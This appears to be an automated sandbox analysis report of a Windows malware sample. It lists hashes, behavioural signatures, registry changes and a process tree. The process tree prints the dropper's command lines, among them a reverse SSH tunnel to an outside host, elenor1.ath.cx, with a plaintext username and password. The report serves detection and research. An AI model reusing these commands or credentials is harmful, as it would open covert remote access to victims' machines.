Analysis
-
max time kernel
77s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
05/12/2022, 23:57
Static task
static1
Behavioral task
behavioral1
Sample
bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe
Resource
win10v2004-20220812-en
General
-
Target
bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe
-
Size
289KB
-
MD5
356682a0be072f6e5c12a796f16ea805
-
SHA1
4b7df88263931fe8ee62564034dbcd8bd23f19f4
-
SHA256
bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d
-
SHA512
547e87ed6d4204bd45ffca9fe4f8fe73938cd8f5f6aa2d2fdf7f2fb113e7ae933c4c1b023fc08d739e99baebfe3bc3d5381ab16019ab9b3147482e6b21537504
-
SSDEEP
6144:527gCbTehEqclWYacoztvRMFv4fYQdFLMmnyzf1Z4H2QqAlggvYSiC9if:527/bTehEqclrytve54fYIMAyzf1ZBAy
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 1764 cssrs.exe 272 System.exe -
resource yara_rule behavioral1/files/0x00070000000139e4-61.dat upx behavioral1/files/0x00070000000139e4-62.dat upx behavioral1/files/0x00070000000139e4-66.dat upx behavioral1/files/0x00070000000139e4-63.dat upx behavioral1/files/0x00080000000139dc-69.dat upx behavioral1/files/0x00080000000139dc-70.dat upx behavioral1/files/0x00080000000139dc-73.dat upx behavioral1/files/0x00080000000139dc-71.dat upx behavioral1/memory/1764-77-0x0000000000400000-0x0000000000425000-memory.dmp upx behavioral1/memory/272-79-0x0000000000400000-0x000000000045C000-memory.dmp upx -
Loads dropped DLL 4 IoCs
pid Process 888 WScript.exe 888 WScript.exe 888 WScript.exe 888 WScript.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ebbafe27430f02478c66b0d1d9ac8e3e000000000200000000001066000000010000200000003e3b61118378c6018e40ef00d84f17eeecad1918dc939f7bd1200ca4dc31d43f000000000e8000000002000020000000263c5e9c875d36572fe9328967ca587f38763752ee6f71869dcf0ec42cdf2e6b900000007b05c7acc0e4bf66d4828b115ebdf6d119f26834e64af385a43ce7ad95a0fbfc3bcb320ef7c11ba19d0bea3af62fcc59420fd5868274e101ff143d52efe8329152ac641d9fcb51a52b85d6b4c070d282d6e8fc8ae062e22fe5df7db4114c9be0db069606dcc75c49885d812f9e556551ea29e54116ab736c779ad175155d9588ff3baafa04ce3f3a1b4efa68340da8e14000000029ac9bd5a375afeb6e67cab4dda2c980978eb8f5e5476cbc27af04848ccb68ce79e0555feea6d1762bda88289f51108fb26dc4f135efd765d31e47cd4d9a2e7b iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{37BA2001-787C-11ED-B51C-6E705F4A26E5} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0effb17890cd901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ebbafe27430f02478c66b0d1d9ac8e3e00000000020000000000106600000001000020000000c39540fb024db27fc383a16181fd1366d8de3cfa2a00d2e6daade052cb89c658000000000e8000000002000020000000fea85319211fd825756aeb276553a99a4ff5d4e3f6597644738521fe664317b02000000003f75d82382775cc1a25f8e35d0e659ec275498ce6f9122fecc9fa72896ab57340000000baee237d804310e339fd889d7663fd4913cfca50de8f1a22b3cc8951dd8811e21132ffe9b4a4d2be5361d27e27fc8bbbdce69561845e9d565018e138d9786742 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "377436024" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1916 iexplore.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1916 iexplore.exe 1916 iexplore.exe 1608 IEXPLORE.EXE 1608 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 1504 wrote to memory of 1336 1504 bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe 26 PID 1504 wrote to memory of 1336 1504 bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe 26 PID 1504 wrote to memory of 1336 1504 bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe 26 PID 1504 wrote to memory of 1336 1504 bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe 26 PID 1504 wrote to memory of 1336 1504 bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe 26 PID 1504 wrote to memory of 1336 1504 bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe 26 PID 1504 wrote to memory of 1336 1504 bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe 26 PID 1336 wrote to memory of 888 1336 WScript.exe 27 PID 1336 wrote to memory of 888 1336 WScript.exe 27 PID 1336 wrote to memory of 888 1336 WScript.exe 27 PID 1336 wrote to memory of 888 1336 WScript.exe 27 PID 1336 wrote to memory of 888 1336 WScript.exe 27 PID 1336 wrote to memory of 888 1336 WScript.exe 27 PID 1336 wrote to memory of 888 1336 WScript.exe 27 PID 888 wrote to memory of 1764 888 WScript.exe 28 PID 888 wrote to memory of 1764 888 WScript.exe 28 PID 888 wrote to memory of 1764 888 WScript.exe 28 PID 888 wrote to memory of 1764 888 WScript.exe 28 PID 888 wrote to memory of 1764 888 WScript.exe 28 PID 888 wrote to memory of 1764 888 WScript.exe 28 PID 888 wrote to memory of 1764 888 WScript.exe 28 PID 888 wrote to memory of 272 888 WScript.exe 32 PID 888 wrote to memory of 272 888 WScript.exe 32 PID 888 wrote to memory of 272 888 WScript.exe 32 PID 888 wrote to memory of 272 888 WScript.exe 32 PID 888 wrote to memory of 272 888 WScript.exe 32 PID 888 wrote to memory of 272 888 WScript.exe 32 PID 888 wrote to memory of 272 888 WScript.exe 32 PID 1916 wrote to memory of 1608 1916 iexplore.exe 35 PID 1916 wrote to memory of 1608 1916 iexplore.exe 35 PID 1916 wrote to memory of 1608 1916 iexplore.exe 35 PID 1916 wrote to memory of 1608 1916 iexplore.exe 35 PID 1916 wrote to memory of 1608 1916 iexplore.exe 35 PID 1916 wrote to memory of 1608 1916 iexplore.exe 35 PID 1916 wrote to memory of 1608 1916 iexplore.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe"C:\Users\Admin\AppData\Local\Temp\bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Data.msi\startup.vbe"2⤵
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Data.msi\alg.vbe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Data.msi\cssrs.exe"C:\Data.msi\cssrs.exe" -d -t -l -e0.0.0.0 -i127.0.0.1 -p2103 -a4⤵
- Executes dropped EXE
PID:1764
-
-
C:\Data.msi\System.exe"C:\Data.msi\System.exe" -ssh -R 16641:127.0.0.1:2103 elenor1.ath.cx -l linux -pw 2n30554⤵
- Executes dropped EXE
PID:272
-
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1916 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1608
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
459B
MD58f5d6310e7fcf52fcb7509930ff14813
SHA1198e6182d515a46167c0193d4d8c0fd985bf3185
SHA256322d1f912491ab13e5362c4e8487cba773d8cde08c35ff518c9a882979204217
SHA512be491e3fa3c99525b1116b328b1ccd9d45611a6e42961ee8649ee6261713f8c07f5906bad1e7c0552f6bf9e2f6c6f9db4be15c3067f6f1dd96e6aefcbbdb05ff
-
Filesize
142KB
MD50bf7c44a9324cdbef4e4d457540518a0
SHA1946e0143896a52d4508f8fd6967629b0cb3e27ab
SHA256071ae39526ae90c3f4599610013b34a364de20393ab6abe7ac22e2497612b2f9
SHA51272dba39111ed76bbed5730486ece3b43b6176c97d8ff0b2548046d28aca72f74475eefe6351e6810906fbc725b4e7345fa6592137c35f3e7d2de105ef96d6a73
-
Filesize
142KB
MD50bf7c44a9324cdbef4e4d457540518a0
SHA1946e0143896a52d4508f8fd6967629b0cb3e27ab
SHA256071ae39526ae90c3f4599610013b34a364de20393ab6abe7ac22e2497612b2f9
SHA51272dba39111ed76bbed5730486ece3b43b6176c97d8ff0b2548046d28aca72f74475eefe6351e6810906fbc725b4e7345fa6592137c35f3e7d2de105ef96d6a73
-
Filesize
1KB
MD5039c9b2c45642603aac8dc7c0999b2d7
SHA157038a7e45b8036c11d143b30153aaa69807aebf
SHA25664d3282227598b86413632dd8bf8a1588c06c834fa4984900934d3dca7d99e12
SHA512bbabd6af0be61ab989747b56b84ee55739e2993fe9f80017163b1b262be74d63825603fa6fc2797efb2e73fed65118e30a8f01e824226d3b523d2da6350db4a6
-
Filesize
62KB
MD59f06e2f8d96169dfe944aa37a15ffd40
SHA1591960352fae52e1e2bdc575035bc0e4a3250cff
SHA2568ab5987a651ccc7a7d9375ab4efe019cb5ea8ed2ff724ec900a1d054f0dec2ac
SHA5127279cafd6df6bc3dda16daa21d176b2f4d51799b2ddca335f447ef4fdcd78b8cc84cad8f0b70a52402bd0c8ccf0f087cbd25808f12c55e27a21235568a66c2ca
-
Filesize
62KB
MD59f06e2f8d96169dfe944aa37a15ffd40
SHA1591960352fae52e1e2bdc575035bc0e4a3250cff
SHA2568ab5987a651ccc7a7d9375ab4efe019cb5ea8ed2ff724ec900a1d054f0dec2ac
SHA5127279cafd6df6bc3dda16daa21d176b2f4d51799b2ddca335f447ef4fdcd78b8cc84cad8f0b70a52402bd0c8ccf0f087cbd25808f12c55e27a21235568a66c2ca
-
Filesize
138B
MD549efe6d104d450d71d2ee7c513845e83
SHA1ac8423b7ea4d7d7e27b67f3c6de03244dbfd5814
SHA2568f9692895b703948cfddfd5160911c214a4ee53c219175fa12afeaef8214997f
SHA512dffc2ac38d1602b31128acd1d3f6f75f9e03c7c481febf8397b52d385b68d6a919ff1f6584941530cf9f80734cba0273d489cc74e50b24dc2eaa2ff7ac905503
-
Filesize
89B
MD527ebf479041e67364f960426655bb757
SHA11dcb48a9f8cbb99439262e06247eb830a519d74c
SHA256e3964b6925d9dc1e1d74715992dd112bd9db960bf4c1c5af0324d0b2cf4f82eb
SHA512c59ef8dc0f74f6e643306c35246436e31f60dc4ac158b12bdfe1dbdc7a40038e252dbaebecdfcf293792723cefa5f55f33cfe44b484f3d281d4876f260ee8197
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize340B
MD558ed47c5c1e3fa9f83f6502d46a6ad4a
SHA1cee05360aee890b099266ff78fb5a95c1ffff315
SHA25606767c1ab56f0ca8f3760a7383d829324fa5a83a6021080bb21c3e54e41bc2b9
SHA5128c98a61aef83bf7c078cc53e0a7e1139b5ac10e6e41ea0019ad248d173ee539eb0369a957e57178565211768c46131d68edd4313aaab707c8269461527b47213
-
Filesize
601B
MD5f594610d32ac3072d0f7774f7a3e6693
SHA1b6a6c9206885f7e9a630a9009d4d89e99d0da5d8
SHA2568066600d39075ecf59be19f6a19db66ae89ef7dd207bd97c871bed9b27eb0488
SHA512d7bc15b47137fc671764cb98602ea8a6ed03c150f965cd14d3f0cc1640ee31d6b150e6f16d564f7b80683531a805f591a00632c0ee68b73645b1f928dc751f38
-
Filesize
142KB
MD50bf7c44a9324cdbef4e4d457540518a0
SHA1946e0143896a52d4508f8fd6967629b0cb3e27ab
SHA256071ae39526ae90c3f4599610013b34a364de20393ab6abe7ac22e2497612b2f9
SHA51272dba39111ed76bbed5730486ece3b43b6176c97d8ff0b2548046d28aca72f74475eefe6351e6810906fbc725b4e7345fa6592137c35f3e7d2de105ef96d6a73
-
Filesize
142KB
MD50bf7c44a9324cdbef4e4d457540518a0
SHA1946e0143896a52d4508f8fd6967629b0cb3e27ab
SHA256071ae39526ae90c3f4599610013b34a364de20393ab6abe7ac22e2497612b2f9
SHA51272dba39111ed76bbed5730486ece3b43b6176c97d8ff0b2548046d28aca72f74475eefe6351e6810906fbc725b4e7345fa6592137c35f3e7d2de105ef96d6a73
-
Filesize
62KB
MD59f06e2f8d96169dfe944aa37a15ffd40
SHA1591960352fae52e1e2bdc575035bc0e4a3250cff
SHA2568ab5987a651ccc7a7d9375ab4efe019cb5ea8ed2ff724ec900a1d054f0dec2ac
SHA5127279cafd6df6bc3dda16daa21d176b2f4d51799b2ddca335f447ef4fdcd78b8cc84cad8f0b70a52402bd0c8ccf0f087cbd25808f12c55e27a21235568a66c2ca
-
Filesize
62KB
MD59f06e2f8d96169dfe944aa37a15ffd40
SHA1591960352fae52e1e2bdc575035bc0e4a3250cff
SHA2568ab5987a651ccc7a7d9375ab4efe019cb5ea8ed2ff724ec900a1d054f0dec2ac
SHA5127279cafd6df6bc3dda16daa21d176b2f4d51799b2ddca335f447ef4fdcd78b8cc84cad8f0b70a52402bd0c8ccf0f087cbd25808f12c55e27a21235568a66c2ca